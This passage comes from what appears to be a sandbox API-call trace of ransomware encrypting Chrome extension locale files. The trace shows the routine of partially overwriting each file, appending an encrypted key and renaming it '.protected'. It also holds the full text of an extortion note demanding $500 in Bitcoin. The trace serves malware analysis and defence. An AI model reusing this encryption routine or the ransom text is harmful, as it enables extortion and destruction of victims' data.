| out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.863] CloseHandle (hObject=0x164) returned 1 [0083.863] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.863] lstrcmpiW (lpString1="mr", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1="mr", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned 150 [0083.864] lstrcmpW (lpString1="mr", lpString2=".") returned 1 [0083.864] lstrcmpW (lpString1="mr", lpString2="..") returned 1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*") returned 152 [0083.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.864] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\.") returned 152 [0083.864] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.864] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.864] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\..") returned 153 [0083.864] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.864] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.864] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.864] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.864] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.864] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.864] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.864] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.864] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.865] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.865] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json") returned 164 [0083.865] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.865] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.866] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.866] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.866] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.867] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.867] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.867] CloseHandle (hObject=0x168) returned 1 [0083.867] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.protected") returned 174 [0083.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.protected")) returned 1 [0083.867] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.867] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.867] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\RESTORE_FILES.txt") returned 168 [0083.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.868] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.868] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.868] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.868] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.868] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.869] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.869] CloseHandle (hObject=0x164) returned 1 [0083.869] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0083.869] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms") returned 150 [0083.869] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0083.869] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0083.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*") returned 152 [0083.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.869] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\.") returned 152 [0083.869] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.869] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.869] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\..") returned 153 [0083.869] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.869] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.869] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.869] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.870] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.870] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.870] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.870] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.870] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.870] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.871] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.871] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json") returned 164 [0083.871] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.871] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.882] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.882] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.882] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.882] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.882] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.882] CloseHandle (hObject=0x168) returned 1 [0083.882] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.protected") returned 174 [0083.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.protected")) returned 1 [0083.883] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.883] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.883] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\RESTORE_FILES.txt") returned 168 [0083.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.884] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.884] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.885] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.885] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.885] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.885] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 